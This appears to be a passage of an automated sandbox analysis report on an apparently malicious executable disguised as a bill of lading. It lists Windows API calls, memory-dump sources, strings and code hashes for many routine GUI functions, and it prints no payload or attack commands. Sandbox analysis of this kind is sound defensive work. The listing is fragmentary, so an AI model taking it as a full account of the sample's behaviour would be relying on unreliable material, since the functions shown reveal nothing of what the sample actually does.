• LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
• LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
• LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
• GetCursorInfo.USER32 ref: 00458E03
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
• Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
• Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
• Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
APIs
• PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
• GetFocus.USER32 ref: 004696E0
• GetDlgCtrlID.USER32(00000000), ref: 004696EB
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessagePost$CtrlFocus
• String ID: 0
• API String ID: 1534620443-4108050209
• Opcode ID: 3dab727c688772619e9efc5d23afb6fcae73775eddc560d175f3e695e52b8611
• Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
• Opcode Fuzzy Hash: 3dab727c688772619e9efc5d23afb6fcae73775eddc560d175f3e695e52b8611
• Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
APIs
• _memset.LIBCMT ref: 00468107
• GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
• GetMenuItemCount.USER32(?), ref: 00468227
• DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
• DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
• DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
• DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
• GetMenuItemCount.USER32 ref: 004682DC
• SetMenuItemInfoW.USER32 ref: 00468317
• GetCursorPos.USER32(00000000), ref: 00468322
• SetForegroundWindow.USER32(?), ref: 0046832D
• TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
• PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID: 0
• API String ID: 3993528054-4108050209
• Opcode ID: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
• Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
• Opcode Fuzzy Hash: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
• Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
APIs
• DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
  • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
  • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
  • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
• SendMessageW.USER32(?), ref: 0046F34C
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
• _wcscat.LIBCMT ref: 0046F3BC
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
• SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
• SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
• SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
• DragFinish.SHELL32(?), ref: 0046F414
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                      • API String ID: 4085615965-3440237614
                                                                                                                      • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                      • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                                                      • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                      • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: __wcsicoll
• String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
• API String ID: 3832890014-4202584635
• Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
• Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
• Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
• Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
APIs
• _memset.LIBCMT ref: 004669C4
• _wcsncpy.LIBCMT ref: 00466A21
• _wcsncpy.LIBCMT ref: 00466A4D
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• _wcstok.LIBCMT ref: 00466A90
  • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
• _wcstok.LIBCMT ref: 00466B3F
• _wcscpy.LIBCMT ref: 00466BC8
• GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
• _wcslen.LIBCMT ref: 00466D1D
• _memset.LIBCMT ref: 00466BEE
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• _wcslen.LIBCMT ref: 00466D4B
• GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
• String ID: X$HH
• API String ID: 3021350936-1944015008
• Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
• Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
• Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
• Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
APIs
• _memset.LIBCMT ref: 0045F4AE
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
• SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
• Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: InfoItemMenu$Sleep_memset
• String ID: 0
• API String ID: 1504565804-4108050209
• Opcode ID: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
• Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
• Opcode Fuzzy Hash: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
• Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
APIs
• DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Window$CreateDestroy
• String ID: ,$tooltips_class32
• API String ID: 1109047481-3856767331
• Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
• Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
• Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
• Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
APIs
• _wcsncpy.LIBCMT ref: 0045CCFA
• __wsplitpath.LIBCMT ref: 0045CD3C
• _wcscat.LIBCMT ref: 0045CD51
• _wcscat.LIBCMT ref: 0045CD63
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045CD78
• SetCurrentDirectoryW.KERNEL32(?), ref: 0045CD8C
• GetFileAttributesW.KERNEL32(?), ref: 0045CDD0
• SetFileAttributesW.KERNEL32(?,?), ref: 0045CDE6
• SetCurrentDirectoryW.KERNEL32(?), ref: 0045CDF8
• SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
• _wcscpy.LIBCMT ref: 0045CE14
• SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath_wcscpy_wcsncpy
• String ID: *.*
• API String ID: 60713673-438819550
• Opcode ID: 85b142244d1ccf5c4d3c1cee1eef160739ab4044d21967f155d0975fbe5026aa
• Instruction ID: 8cd893c5bfa72372037dc369ee999379159c68fad848afe37117942e2b211ff8
• Opcode Fuzzy Hash: 85b142244d1ccf5c4d3c1cee1eef160739ab4044d21967f155d0975fbe5026aa
• Instruction Fuzzy Hash: 3A51B4B61043419FD735EB58C885AEB73A4EB84306F44882FEDC983242D67D998E875F
APIs
• _memset.LIBCMT ref: 00455127
• GetMenuItemInfoW.USER32 ref: 00455146
• DeleteMenu.USER32(?,?,00000000), ref: 004551B2
• DeleteMenu.USER32(?,?,00000000), ref: 004551C8
• GetMenuItemCount.USER32(?), ref: 004551D9
• SetMenu.USER32(?,00000000), ref: 004551E7
• DestroyMenu.USER32(?,?,00000000), ref: 004551F4
• DrawMenuBar.USER32 ref: 00455207
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
• String ID: 0
• API String ID: 1663942905-4108050209
• Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
• Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
• Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
• Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
APIs
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
• String ID:
• API String ID: 1481289235-0
• Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
• Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
• Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
• Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
APIs
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
• ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
• SendMessageW.USER32 ref: 0046FBAF
• SendMessageW.USER32 ref: 0046FBE2
• ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
• SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
• ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
• SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
• SendMessageW.USER32 ref: 0046FD00
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessageSend$IconImageList_$CreateExtractReplace
• String ID:
• API String ID: 2632138820-0
APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
• LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
• LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
• LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
• LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
• LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
• LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
• LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
• LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
• LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
• LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
• LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
• LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
• LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
• LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
Similarity
• API ID: CursorLoad
• String ID:
• API String ID: 3238433803-0
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
• _wcslen.LIBCMT ref: 00460B00
• __swprintf.LIBCMT ref: 00460B9E
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
• GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
• GetDlgCtrlID.USER32(?), ref: 00460CE6
• GetWindowRect.USER32(?,?), ref: 00460D21
• GetParent.USER32(?), ref: 00460D40
• ScreenToClient.USER32(00000000), ref: 00460D47
• GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
• GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
Strings
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
• String ID: %s%u
• API String ID: 1899580136-679674701
APIs
• CoTaskMemFree.OLE32(?), ref: 0047D6D3
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• StringFromCLSID.OLE32(?,?), ref: 0047D6B5
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• StringFromIID.OLE32(?,?), ref: 0047D7F0
• CoTaskMemFree.OLE32(?), ref: 0047D80A
Strings
Similarity
• API ID: FreeFromStringTask_wcslen$_wcscpy
• String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
• API String ID: 2485709727-934586222
APIs
Strings
Similarity
• API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
• String ID: HH
• API String ID: 3381189665-2761332787
APIs
• GetDC.USER32(00000000), ref: 00434585
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
• CreateCompatibleDC.GDI32(00000000), ref: 0043459B
• SelectObject.GDI32(00000000,?), ref: 004345A9
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
• GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
Strings
Similarity
• API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
• String ID: (
• API String ID: 3300687185-3887548279
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
• __swprintf.LIBCMT ref: 0045E4D9
• _printf.LIBCMT ref: 0045E595
• _printf.LIBCMT ref: 0045E5B7
Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                                                      • API String ID: 3590180749-2894483878
                                                                                                                      • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                      • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                                                      • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                      • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 0046F911
• LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
• SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
• DeleteObject.GDI32(?), ref: 0046F950
• DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
• SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
• DeleteObject.GDI32(?), ref: 0046F9CF
• DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
• ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
• DestroyIcon.USER32(?), ref: 0046FA4F
• SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
• DeleteObject.GDI32(?), ref: 0046FA68
• DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
• String ID:
• API String ID: 3412594756-0
• Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
• Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
• Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
• Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
APIs
  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
• GetDriveTypeW.KERNEL32 ref: 0045DA30
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: SendString$_wcslen$BuffCharDriveLowerType
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 4013263488-4113822522
• Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
• Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
